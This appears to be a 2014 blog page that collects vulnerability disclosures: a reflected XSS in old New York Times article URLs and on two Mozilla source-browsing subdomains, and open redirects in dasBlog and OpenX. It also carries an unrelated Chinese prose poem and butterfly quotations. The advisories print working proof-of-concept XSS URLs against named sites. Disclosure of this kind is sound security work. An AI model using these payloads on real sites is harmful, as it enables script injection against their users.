Friday, 31 October 2014

New York Times nytimes.com Page Design XSS Vulnerability (Almost all Article Pages Before 2013 are Affected)

The New York Times  Old Articles Can Be Exploited by XSS Attacks (Almost all Article Pages Before 2013 Are Affected)




Domain:
http://www.nytimes.com/



"The New York Times (NYT) is an American daily newspaper, founded and continuously published in New York City since September 18, 1851, by the New York Times Company. It has won 114 Pulitzer Prizes, more than any other news organization. The paper's print version has the largest circulation of any metropolitan newspaper in the United States, and the second-largest circulation overall, behind The Wall Street Journal. It is ranked 39th in the world by circulation. Following industry trends, its weekday circulation has fallen to fewer than one million daily since 1990. Nicknamed for years as "The Gray Lady", The New York Times is long regarded within the industry as a national "newspaper of record". It is owned by The New York Times Company. Arthur Ochs Sulzberger, Jr., (whose family (Ochs-Sulzberger) has controlled the paper for five generations, since 1896), is both the paper's publisher and the company's chairman. Its international version, formerly the International Herald Tribune, is now called the International New York Times. The paper's motto, "All the News That's Fit to Print", appears in the upper left-hand corner of the front page." (Wikipedia)






(1) Vulnerability Description:

The New York Times has a computer cyber security problem. Hacker can exploit its users by XSS bugs. 


The code program flaw occurs at New York Times’s URLs. Nytimes (short for New York Times) uses part of the URLs to construct its pages. However, it seems that Nytimes does not filter the content used for the construction at all before 2013.


Based on Nytimes’s Design, Almost all URLs before 2013 are affected (All pages of articles). In fact, all article pages that contain “PRINT” button, “SINGLE PAGE” button, “Page *” button, “NEXT PAGE” button are affected.


Nytimes changed this mechanism since 2013. It decodes the URLs sent to its server. This makes the mechanism much safer now.


However, all URLs before 2013 are still using the old mechanism. This means almost all article pages before 2013 are still vulnerable to XSS attacks. I guess the reason Nytimes does not filter URLs before is cost. It costs too much (money & human capital) to change the database of all posted articles before.





















Living POCs Codes:
http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html//' "><img src=x onerror=prompt(/justqdjing/)>
http://www.nytimes.com/2011/01/09/travel/09where-to-go.html//' "><img src=x onerror=prompt(/justqdjing/)>?pagewanted=all&_r=0
http://www.nytimes.com/2010/12/07/opinion/07brooks.html//' "><img src=x onerror=prompt(/justqdjing/)>
http://www.nytimes.com/2009/08/06/technology/06stats.html//' "><img src=x onerror=prompt(/justqdjing/)>
http://www.nytimes.com/2008/07/09/dining/091crex.html//' "><img src=x onerror=prompt(/justqdjing/)>
http://www.nytimes.com/2007/11/14/opinion/lweb14brain.html//' "><img src=x onerror=prompt(/justqdjing/)>





POC Video:

(2) Vulnerability Analysis:
Take the following link as an example,
It can see that for the page reflected, it contains the following codes. All of them are vulnerable.


<li class=”print”>
<a href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><vulnerabletoattack?pagewanted=print”>Print</testtesttest?pagewanted=print”></a>
</li>


<li class=”singlePage”>
<a href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><testtesttest?pagewanted=all”> Single Page</vulnerabletoattack?pagewanted=all”></a>
 </li>


<li> <a onclick=”s_code_linktrack(‘Article-MultiPagePageNum2′);” title=”Page 2″ href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><vulnerabletoattack?pagewanted=2″>2</testtesttest?pagewanted=2″></a> 
</li>


<li> <a onclick=”s_code_linktrack(‘Article-MultiPagePageNum3′);” title=”Page 3″ href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><vulnerabletoattack?pagewanted=3″>3</testtesttest?pagewanted=3″></a> 
</li>


<a class=”next” onclick=”s_code_linktrack(‘Article-MultiPage-Next’);” title=”Next Page” href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><vulnerabletoattack?pagewanted=2″>Next Page »</testtesttest?pagewanted=2″></a>






(3) What is XSS?
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy.


"Hackers are constantly experimenting with a wide repertoire of hacking techniques to compromise websites and web applications and make off with a treasure trove of sensitive data including credit card numbers, social security numbers and even medical records. Cross-site Scripting (also known as XSS or CSS) is generally believed to be one of the most common application layer hacking techniques Cross-site Scripting allows an attacker to embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page to fool the user, executing the script on his machine in order to gather data. The use of XSS might compromise private information, manipulate or steal cookies, create requests that can be mistaken for those of a valid user, or execute malicious code on the end-user systems. The data is usually formatted as a hyperlink containing malicious content and which is distributed over any possible means on the internet." (Acunetix)





The vulnerability can be attacked without user login. Tests were performed on Firefox (34.0) in Ubuntu (14.04) and IE (9.0.15) in Windows 8.









Discover and Reporter:
Jing Wang, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (@justqdjing)










More Details:
http://lists.openwall.net/full-disclosure/2014/10/16/2
http://www.tetraph.com/blog/xss-vulnerability/new-york-times-xss
http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1102
http://webcabinet.tumblr.com/post/121907302752/new-york-times-xss
http://www.inzeed.com/kaleidoscope/xss-vulnerability/new-york-times-xss
https://progressive-comp.com/?l=full-disclosure&m=141343993908563&w=1
http://webtech.lofter.com/post/1cd3e0d3_6f57c56
http://tetraph.blog.163.com/blog/static/2346030512014101270479/
https://vulnerabilitypost.wordpress.com/2014/11/01/new-york-times-xss
http://lifegrey.tumblr.com/post/121912534859/tous-les-liens-vers-les-articles
http://securityrelated.blogspot.com/2014/10/new-york-times-design.html
https://mathfas.wordpress.com/2014/11/01/new-york-times-xss
http://computerobsess.blogspot.com/2014/10/new-york-times-design.html
http://whitehatview.tumblr.com/post/103788276286/urls-to-articles-xss
http://diebiyi.com/articles/security/xss-vulnerability/new-york-times-xss






CVE-2014-7292 Newtelligence dasBlog Dest Redirect Privilege Escalation Vulnerability

Exploit Title: Newtelligence dasBlog Dest Redirect Privilege Escalation Vulnerability
Product: dasBlog
Vendor:    Newtelligence
Vulnerable Versions: 2.3 (2.3.9074.18820) 2.2 (2.2.8279.16125) 2.1(2.1.8102.813)
Tested Version: 2.3 (2.3.9074.18820)
Advisory Publication: OCT 15, 2014
Latest Update:    OCT 15, 2014
Vulnerability Type: Open Redirect [CWE-601]
CVSS v2 Base Score: 5.8 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:P/A:N) (legend)
Impact Subscore: 4.9
Exploitability Subscore: 8.6
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]









Advisory Details:
Newtelligence dasBlog ct.ashx is vulnerable to Open Redirect attacks.
dasBlog supports a feature called Click-Through which basically tracks all links clicked inside your blog posts. It's a nice feature that allows the blogger to stay informed what kind of content readers like. If Click-Through is turned on, all URLs inside blog entries will be replaced with <URL to your blog>/ct.ashx?id=<Blog entry ID>&url=<URL-encoded original URL> which of course breaks WebSnapr previews.
Web.config code:
<add verb="*" path="ct.ashx" type="newtelligence.DasBlog.Web.Services.ClickThroughHandler, newtelligence.DasBlog.Web.Services"/>
(1) The vulnerability occurs at "ct.ashx?" page, with "&url" parameter,.









Solutions:
2014-10-15 Public disclosure with self-written patch.







References:

CVE-2014-2230 - OpenX Dest Redirect Privilege Escalation Web Security Vulnerability


















CVE-2014-2230 - OpenX 2.8.10 Dest Redirect Privilege Escalation Web Security Vulnerability  



Exploit Title: OpenX Dest Redirect Privilege Escalation Web Security Vulnerability

Product: OpenX
Vendor:  OpenX
Vulnerable Versions: 2.8.10 and probably prior
Tested Version: 2.8.10
Advisory Publication: October 06, 2014
Latest Update:  October 11, 2014
Vulnerability Type: URL Redirection to Untrusted Site ('Open Redirect') [CWE-601]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 5.8 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:P/A:N) (legend)
Impact Subscore: 4.9
Exploitability Subscore: 8.6
CVSS Version 2 Metrics:
Access Vector: Network exploitable; Victim must voluntarily interact with attack mechanism
Access Complexity: Medium
Authentication: Not required to exploit
Impact Type: Allows unauthorized disclosure of information; Allows unauthorized modification
Writer and Reporter: Jing Wang [School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore] (@justqdjing)






Caution Details:



(1) Vendor & Product Description:



Vendor:

OpenX



Product & Vulnerable Versions:

OpenX
2.8.10


Vendor URL & Download:

Product can be obtained from here,
http://openx.com/





Product Introduction Overview:

OpenX is a real time advertising technology company. The company has developed an integrated technology platform that combines ad server and a real time bidding (RTB) exchange with yield optimization for advertising and digital media companies. OpenX’s Ad Exchange is not only one of the world’s largest programmatic digital advertising exchanges. It’s the best performing marketplace with the highest-quality, independently-rated inventory. Building it was no small feat, and we were only able to do it because we understand that publishers’ primary goal with advertising is to optimize monetization. That means maximizing revenue and control, and our solution helps you do both. The first step in any high-performance marketplace is creating demand. Our real time auctions give you maximum exposure to demand sources. All of the largest DSPs, networks and agency trading desks, plus the top advertisers, already purchase inventory on OpenX’s Ad Exchange. We connect you to a broad and deep selection of buyers, and you choose which ones can bid and which impressions they can win. Once you have interested buyers, you want to be able to showcase your inventory and command the best price. Our Ad Exchange supports a variety of formats and screens, letting you easily make all of your inventory available on one platform. We also make it easy for you to extract the full value out of each impression. You can set price floors and employ whitelist and blacklist features to avoid channel conflict and potential dilution of relationships with advertisers who buy direct. Furthermore, you can utilize our technology to manage your premium inventory through direct relationships with advertisers by leveraging preferred deals and private auctions.

According to Pixelate, OpenX Marketplace has the highest quality ad inventory in 2015, beating Google's ad marketplace (Google Adx). OpenX integrations are widely distributed / long tail and currently sees the second most impressions on the internet, after Google. It's new traffic quality platform for viewability and fraud detection technology has ability to leverage this position by seeing impressions earlier than existing ad verification / pre-bid solutions used by DSP and agency trading desks. (a) OpenX was ranked the 3rd fastest growing software company in North America with 44,075% growth in revenues from 2008 - 2012 by Deloitte's Technology Fast 500. (b) According to a report from LeadLedger.com, OpenX has the second largest publisher adserver install base behind Google in 2013. (c) OpenX's current products include the OpenX Exchange, Ad Server, and SSP (supply side platform) with Demand Fusion. (d) 96% of top 100 brand advertisers and 58% of comScore 100 publishers work with OpenX, conducting 250 billion monthly transactions with 12 billion daily bids from buyers. All major demand side platforms (DSP) including Rocketfuel, Criteo, Turn, MediaMath, Invite Media and Appnexus buy from OpenX ad exchange.







(2) Vulnerability Details:
OpenX web application has a computer cyber security bug problem. It can be exploited by Unvalidated Redirects and Forwards (Open Redirect or URL Redirection) attacks. This could allow a user to create a specially crafted URL, that if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choosing. Such attacks are useful as the crafted URL initially appear to be a web page of a trusted site. This could be leveraged to direct an unsuspecting user to a web page containing attacks that target client side software such as a web browser or document rendering programs.

Several other similar products 0-day vulnerabilities have been found by some other bug hunter researchers before. OpenX has patched some of them. The Full Disclosure mailing list is a public forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. FD differs from other security lists in its open nature and support for researchers' right to decide how to disclose their own discovered bugs. The full disclosure movement has been credited with forcing vendors to better secure their products and to publicly acknowledge and fix flaws rather than hide them. Vendor legal intimidation and censorship attempts are not tolerated here! It also publishes suggestions, advisories, solutions details related to Open Redirect vulnerabilities and cyber intelligence recommendations.




Source code of adclick.php:

$destination = MAX_querystringGetDestinationUrl($adId[0]);
MAX_redirect($destination);

The "MAX_redirect" function is bellow,

function MAX_redirect($url)
{
if (!preg_match('/^(?:javascript|data):/i', $url)) {
header('Location: '.$url);
MAX_sendStatusCode(302);
}

The header() function sends a raw HTTP header to a client without any checking of the "$dest" parameter at all.




(1) For "adclick.php", the code programming flaw occurs with "&dest" parameter.



(2) For "ck.php", it uses "adclick.php" file. the code programming flaw occurs with "_maxdest" parameter.







(3) Solutions:
2014-10-12 Public disclosure with self-written patch.









References:

Mozilla Online Website Two Sub-Domains XSS (Cross-site Scripting) Bugs ( All URLs Under the Two Domains)

Mozilla Online Website Two Sub-Domains XSS (Cross-site Scripting) Bugs ( All URLs Under the Two Domains)




Domains:
http://lxr.mozilla.org/
http://mxr.mozilla.org/
(The two domains above are almost the same)





Websites information:
"lxr.mozilla.org, mxr.mozilla.org are cross references designed to display the Mozilla source code. The sources displayed are those that are currently checked in to the mainline of the mozilla.org CVS server, Mercurial Server, and Subversion Server; these pages are updated many times a day, so they should be pretty close to the latest‑and‑greatest." (from Mozilla)

"Mozilla is a free-software community which produces the Firefox web browser. The Mozilla community uses, develops, spreads and supports Mozilla products, thereby promoting exclusively free software and open standards, with only minor exceptions. The community is supported institutionally by the Mozilla Foundation and its tax-paying subsidiary, the Mozilla Corporation. In addition to the Firefox browser, Mozilla also produces Thunderbird, Firefox Mobile, the Firefox OS mobile operating system, the bug tracking system Bugzilla and a number of other projects." (Wikipedia)






(1) Vulnerability description:
Mozilla website has a computer cyber security problem. Hacker can attack it by XSS bugs. Here is the description of XSS: "Hackers are constantly experimenting with a wide repertoire of hacking techniques to compromise websites and web applications and make off with a treasure trove of sensitive data including credit card numbers, social security numbers and even medical records. Cross-site Scripting (also known as XSS or CSS) is generally believed to be one of the most common application layer hacking techniques Cross-site Scripting allows an attacker to embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page to fool the user, executing the script on his machine in order to gather data. The use of XSS might compromise private information, manipulate or steal cookies, create requests that can be mistaken for those of a valid user, or execute malicious code on the end-user systems. The data is usually formatted as a hyperlink containing malicious content and which is distributed over any possible means on the internet." (Acunetix)



All pages under the following two URLs are vulnerable.
http://lxr.mozilla.org/mozilla-central/source
http://mxr.mozilla.org/mozilla-central/source



This means all URLs under the above two domains can be used for XSS attacks targeting Mozilla's users.



Since there are large number of pages under them. Meanwhile, the contents of the two domains vary. This makes the vulnerability very dangerous. Attackers can use different URLs to design XSS attacks to Mozilla's variety class of users.



















POC Codes:
http://lxr.mozilla.org/mozilla-central/source/<body onload=prompt("justqdjing")>



http://mxr.mozilla.org/mozilla-central/source/<body onload=prompt("justqdjing")>






POC Video:








(2) Vulnerability Analysis:
Take the following link as an example,
http://lxr.mozilla.org/mozilla-central/source/chrome/<attacktest>



In the page reflected, it contains the following codes.
<a href="/mozilla-central/source/chrome/%253Cattacktest%253E">
<attacktest></attacktest>
</a>


If insert "<body onload=prompt("justqdjing")>" into the URL, the code can be executed.





The vulnerability can be attacked without user login. Tests were performed on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.







(3) Vulnerability Disclosure:
The vulnerability have been reported to bugzilla.mozilla.org. Mozilla are dealing with this issue.








Discovered and Reported by:
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (@justqdjing)












More Details:
http://lists.openwall.net/full-disclosure/2014/10/20/8
http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure
http://seclists.org/fulldisclosure/2014/Oct/92
http://www.tetraph.com/blog/xss-vulnerability/mozilla-xss
http://whitehatview.tumblr.com/post/101466861221/mozilla-mozilla
http://tetraph.blog.163.com/blog/static/2346030512014101115642885/
http://computerobsess.blogspot.com/2014/10/mozilla-mozillaorg-two-sub-domains.html

https://tetraph.wordpress.com/2014/11/26/mozilla-two-sub-domains-xss
http://tetraph.blogspot.com/2014/10/mozilla-mozillaorg-two-sub-domains.html
http://itsecurity.lofter.com/post/1cfbf9e7_54fc68f
http://whitehatview.tumblr.com/post/103540568486/two-of-mozillas-cross
http://diebiyi.com/articles/security/xss-vulnerability/mozilla-xss
http://www.inzeed.com/kaleidoscope/xss-vulnerability/mozilla-xss
https://mathfas.wordpress.com/2014/11/01/mozilla-xss
http://www.tetraph.com/blog/xss-vulnerability/mozilla-xss
http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1121

残鸳 - 暮春

暮春之初,流水淙淙,蝶舞,莺歌。一片片鹅黄轻挂杨柳,一丛丛嫩绿蔓延大地。

纸鸢轻舞,融入那一抹湛蓝,和者朵朵素云,吮吸着者春天的甘露。纸鸢漫步,恰似一个个跳跃的音符,欢快而愉悦。突然线断,犁破了飞翔的梦!


00b1OOOPICa1


















残阳如血,寒风又泼,那一抹余光染红苍穹,残鸢轻飘,宛若一朵啼血玫瑰,又如一片破碎的梦,跌跌撞撞,心在喋血,


 弦断,琴瑟有谁听。


高山何现,流水何惭!



作者:
WANG Jing (王晶) (谷雨)
写于 数学系-中国科学技术大学
http://www.tetraph.com/wangjing



相关视频:

The book of songs Bei Feng drum

Love, Affection, Sweet, Sleep - Pure Music - Ghost, Final Fantasy

The book of songs Bei Feng drum
Hear the roll of our drums! See how we leap about, using our weapons! Those do the fieldwork in the state, or fortify Cao, while we alone March to the south.
From Sun Zizhong, Ping Chen and song. [but] he did not lead us back, and our sorrowful hearts are very sad.
Here will he reside ; here will he sit? Here we lose our horses? And we seek for them? Among the trees of the forest.
For life or for death, however separated, to our wives we pledged our word. Hold your hand and grow old together with you.
Alas for our separation! We have no prospect of life. Alas for our stipulation! We cannot make it good.






diebiyi:
http://www.diebiyi.com/
http://www.diebiyi.com/articles/
Music: Ghost, Final Fantasy - Mixed Music
Background: Beautiful Love






Video:
Essaybeans (一麦) (http://www.tetraph.com/essaybeans)
(http://www.inzeed.com/bowen)









视频列表:

Butterfly - Motto - Sentences Related to Butterfly

The butterfly counts not months but moments, and has time enough.  ~Rabindranath Tagore


May the wings of the butterfly kiss the sun
And find your shoulder to light on,
To bring you luck, happiness and riches
Today, tomorrow and beyond.
~Irish Blessing


Butterflies are self propelled flowers.  ~R.H. Heinlein


If nothing ever changed, there'd be no butterflies.  ~Author Unknown


The caterpillar does all the work but the butterfly gets all the publicity.  ~Attributed to George Carlin


What the caterpillar calls the end of the world, the master calls a butterfly.  ~Richard Bach


But these are flowers that fly and all but sing:
And now from having ridden out desire
They lie closed over in the wind and cling
Where wheels have freshly sliced the April mire.
~Robert Frost, "Blue-Butterfly Day"


I saw a poet chase a butterfly in a meadow.  He put his net on a bench where a boy sat reading a book.  It's a misfortune that it is usually the other way round.  ~Karl Kraus


Beautiful and graceful, varied and enchanting, small but approachable, butterflies lead you to the sunny side of life.  And everyone deserves a little sunshine.  ~Jeffrey Glassberg


The butterfly is a flying flower,
The flower a tethered butterfly.
~Ponce Denis Écouchard Lebrun
Happiness is a butterfly, which when pursued, is always just beyond your grasp, but which, if you will sit down quietly, may alight upon you.  ~Nathaniel Hawthorne


There is nothing in a caterpillar that tells you it's going to be a butterfly.  ~Richard Buckminster Fuller


They seemed to come suddenly upon happiness as if they had surprised a butterfly in the winter woods.  ~Edith Wharton


With the rose the butterfly's deep in love,
A thousand times hovering round;
But round himself, all tender like gold,
The sun's sweet ray is hovering found...
~Heinrich Heine, "New Spring," 1826, translated from German in the original metre by Edgar Alfred Bowring


The butterfly long loved the beautiful rose,
And flirted around all day;
While round him in turn with her golden caress,
Soft fluttered the sun's warm ray....
I know not with whom the rose was in love,
But I know that I loved them all.
The butterfly, rose, and the sun's bright ray,
The star and the bird's sweet call.
~Heinrich Heine, "A New Spring," 1826, translated from German by Charles Godfrey Leland, Pictures of Travel, 1855


"Just living is not enough," said the butterfly, "one must have sunshine, freedom and a little flower."  ~Hans Christian Andersen


Love is like a butterfly:  It goes where it pleases and it pleases wherever it goes.  ~Author Unknown


I've watched you now a full half-hour;
Self-poised upon that yellow flower
And, little Butterfly!  Indeed
I know not if you sleep or feed.
How motionless! - not frozen seas
More motionless! and then
What joy awaits you, when the breeze
Hath found you out among the trees,
And calls you forth again!
~William Wordsworth, "To a Butterfly"


I only ask to be free.  The butterflies are free.  ~Charles Dickens


The butterfly's attractiveness derives not only from colors and symmetry:  deeper motives contribute to it.  We would not think them so beautiful if they did not fly, or if they flew straight and briskly like bees, or if they stung, or above all if they did not enact the perturbing mystery of metamorphosis: the latter assumes in our eyes the value of a badly decoded message, a symbol, a sign.  ~Primo Levi


And what's a butterfly? At best,
He's but a caterpillar, at rest.
~John Grey


Flowers and butterflies drift in color, illuminating spring.  ~Author Unknown


We are like butterflies who flutter for a day and think it is forever.  ~Carl Sagan


This great purple butterfly,
In the prison of my hands,
Has a learning in his eye
Not a poor fool understands.
~William Butler Yeats, "Another Song of a Fool"


[N]ot quite birds, as they were not quite flowers, mysterious and fascinating as are all indeterminate creatures.  ~Elizabeth Goudge

The butterfly, a cabbage-white,
(His honest idiocy of flight)
Will never now, it is too late,
Master the art of flying straight.
~Robert Graves, "Flying Crooked"


The green grass and the happy skies
court the fluttering butterflies.
~Terri Guillemets
Know thyself!  A maxim as pernicious as it is ugly.  Whoever observes himself arrests his own development.  A caterpillar who wanted to know itself well would never become a butterfly.  ~Andre Gide


Do ye not comprehend that we are worms,
Born to bring forth the angelic butterfly
That flieth unto judgment without screen?
~Dante Alighieri


Diebiyi:
http://www.diebiyi.com/
http://www.diebiyi.com/articles/
Music: Violin Concerto The Butterfly LOVERS - Mixed Music
Background: Bufferfly


视频列表: